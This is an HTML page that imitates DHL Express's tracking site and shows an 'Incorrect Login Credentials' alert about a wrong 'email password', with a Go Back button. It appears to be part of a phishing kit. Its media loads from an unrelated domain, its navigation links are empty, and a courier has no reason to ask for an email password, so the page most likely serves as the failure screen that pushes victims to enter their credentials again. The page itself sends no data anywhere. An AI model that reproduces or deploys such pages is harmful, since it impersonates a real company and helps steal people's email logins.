




<!DOCTYPE html>
<html>

<title>DHL EXPRESS NOTIFICATION </title>


<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

<head>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js">
        <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <meta charset="UTF-8">
    <title>DHL Express | Track Shipment</title>
    <link rel="icon" href="./photos/favicon.jpg" type="image/gif" sizes="16x16">
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <style style="text/css">
        .hoverTable {
        border-collapse: collapse;
    }

    .hoverTable td {
        padding: 7px;
    }

    /* Define the default color for all the table rows */
    .hoverTable tr {
        background: #CA1E07;
    }

    /* Define the hover highlight color for the table row */
    .hoverTable tr:hover {
        background-color: #FFBF00;
    }
    </style>
    <style>
        /* unvisited link */
    a:link {
        color: #FFF;
    }

    /* visited link */
    a:visited {
        color: #FFF;
    }

    /* mouse over link */
    a:hover {
        color: #000;
    }

    /* selected link */
    a:active {
        color: #000;
    }

    .main-video-wrapper {
          position:fixed;
          top:0;
          left:0;
          width:100%;
          height:100vh;
          overflow:hidden;
          z-index: -3;

        }


    </style>
</head>

<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
    <table cellspacing="0" width="100%" height="100%">
        <tr>
            <td height="10" bgcolor="#000"></td>
        </tr>
        <tr>
            <td height="65" bgcolor="#FFF">
                <table width="98%" align="left">
                    <tr>
                        <td style="width:10px;"></td>
                        <td>
                            <img src="https://imgur.com/kAQjgOv.png" style="width:120px; height:40px;">
                        </td>
                        <td>
                            <table align="right" cellspacing="0">
                                <tr>
                                    <td>
                                        <table class="hoverTable" style="box-shadow: 4px 4px 5px #000; border-radius: 3px 3px; padding:10px;">
                                            <tr>
                                                <td style="height:25px; width:85px; border-radius: 2px 2px;">
                                                    <a href="" style="text-decoration:none;">
                                                        <font face="verdana" size="2">
                                                            &nbsp; | Home
                                                        </font>
                                                    </a>
                                                </td>
                                            </tr>
                                        </table>
                                    </td>
                                    <td style="width:10px;"></td>
                                    <td>
                                        <table class="hoverTable" style="box-shadow: 4px 4px 5px #000; border-radius: 3px 3px; padding:10px;">
                                            <tr>
                                                <td style="height:25px; width:150px; border-radius: 2px 2px;">
                                                    <a href="" style="text-decoration:none;">
                                                        <font face="verdana" size="2">
                                                            &nbsp; | Track Shipment
                                                        </font>
                                                    </a>
                                                </td>
                                            </tr>
                                        </table>
                                    </td>
                                    <td style="width:10px;"></td>
                                    <td>
                                        <table class="hoverTable" style="box-shadow: 4px 4px 5px #000; border-radius: 3px 3px; padding:10px;">
                                            <tr>
                                                <td style="height:25px; width:85px; border-radius: 2px 2px;">
                                                    <a href="" style="text-decoration:none;">
                                                        <font face="verdana" size="2">
                                                            &nbsp; | Login
                                                        </font>
                                                    </a>
                                                </td>
                                            </tr>
                                        </table>
                                    </td>
                                    <td style="width:10px;"></td>
                                    <td>
                                        <table class="hoverTable" style="box-shadow: 4px 4px 5px #000; border-radius: 3px 3px; padding:10px;">
                                            <tr>
                                                <td style="height:25px; width:105px; border-radius: 2px 2px;">
                                                    <a href="" style="text-decoration:none;">
                                                        <font face="verdana" size="2">
                                                            &nbsp; | Register
                                                        </font>
                                                    </a>
                                                </td>
                                            </tr>
                                        </table>
                                    </td>
                                </tr>
                            </table>
                        </td>
                    </tr>
                </table>
            </td>
        </tr>
        <tr>
            <td height="35%">
                <!-- videooo div start//////////// -->
                <div class="main-video-wrapper">
                    <!-- Embedded Video Element -->
                    <video playsinline="playsinline" autoplay="autoplay" muted="muted" loop="loop">
                        <source src="https://deltaww.pro/hl/bg.mp4" type="video/mp4">
                    </video>
                </div>
                <!-- Overlay Div for the Video -->
                <!-- <div class="main-video-overlay"></div> -->
                <!-- video div close/////////////////// -->

<style>
body {
font-family: Arial;
}

input[type=email], select {
width: 100%;
padding: 12px 20px;
margin: 15px 0;
display: block;
border: 1px solid #ccc;
border-radius: 4px;
box-sizing: border-box;
}

input[type=password], select {
width: 100%;
padding: 12px 20px;
margin: 15px 0;
display: block;
border: 1px solid #ccc;
border-radius: 4px;
box-sizing: border-box;
}

input[type=submit] {
width: 100%;
background-color: white;
color: white;
padding: 14px 20px;
margin: 8px 0;
border: none;
border-radius: 4px;
cursor: pointer;
}

input[type=submit]:hover {
background-color: #0078d7;
}

div.container {
margin: auto;
width: 50%;
padding: 10px;
border: 3px white;
border-radius: 01px;
background-color: white;
width: 380px;
padding: 20px;
border-style: solid;
border-width: thin;
}
</style>

<body>


<br><br><br><br>
<div class="container">


<img src="https://imgur.com/9ZJDaRP.png"  width="200" height="35"></img>
<p><font face="Trebuchet MS" color="Black" size="2">

<p></p>
<font face="Arial, Helvetica, sans-serif" size="+2" color="#CA1E07">
    <br>

    Incorrect Login Credentials
                                                        </font>
                                                        <br><br>
                                                        <font face="Arial, Helvetica, sans-serif" size="2" color="#000">

                                                            <br>
                                                            

                                                           <b>Alert!:</b> Unfortunately, we can't log you in because the email password you entered is incorrect. Please go back and try again.
                                                  
<p></p>
<form action="javascript:history.back()" method="POST">




<center>


<br>
<br>
<br>

</font>

<div align="right">
<input type="submit" value="<< Go Back" size="2" font face="Arial, Helvetica, sans-serif" color="#FFF" style="height:40px; width:150px; box-shadow: 2px 2px 2px #000; border-radius: 1px 1px; background: #CA1E07; border: 1px #CA1E07" >
</div>
</center>


</form>



<tr>
                                        <td style="height:30px;"></td>
                                    </tr>
                                </table>
                            </div>
                            <br><br><br><br><br><br>
                        </div>
                    </div>
                </div>
                <br><br>
            </td>


            <td height="30" bgcolor="#B40404">
                <div align="center">
                    <font face="verdana" size="1" color="#FFF">
                        DHL Express &copy;2024 | All rights reserved
                    </font>
                </div>
            </td>



</div>





</body>

</html>
